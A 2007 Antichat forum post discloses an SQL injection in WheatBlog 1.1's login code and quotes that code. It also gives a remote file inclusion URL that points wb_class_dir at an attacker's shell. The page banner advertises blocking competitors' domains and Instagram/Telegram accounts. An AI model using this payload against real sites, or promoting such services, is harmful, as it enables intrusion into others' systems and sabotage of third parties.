WheatBlog 1.1 RFI/SQL Injection

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
WheatBlog 1.1 RFI/SQL Injection

Опции темы

Поиск в этой теме

Опции просмотра

WheatBlog 1.1 RFI/SQL Injection

30.06.2007, 16:01

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

С нами: 10408706

Репутация: 4451

WheatBlog 1.1 RFI/SQL Injection

SQL иньекция в функции логина , но под чужим аккаунтом не залезть.Возможен посимвольный перебор при условии что magic_quotes_gpc = off

Код:

$sql = "select * from $tblUsers where login = '$login'";
if ( $login	 != $row['login'] )	$valid_user = 0;
		if ( $password  != $row['password'] ) $valid_user = 0;

RFI

Код:

includes/sessions.php?wb_class_dir=shell?

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters	bxN5	Forum for discussion of ANTICHAT	1	09.04.2007 19:07
SQL Injection FAQ	bx_N	Forum for discussion of ANTICHAT	2	08.03.2007 18:48
Hacking Databases-SQL Injection Attacks	Dracula4ever	Комментарии к видео	4	01.02.2007 16:44
CRLF injection	Electro	Уязвимости	6	22.08.2006 14:28

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules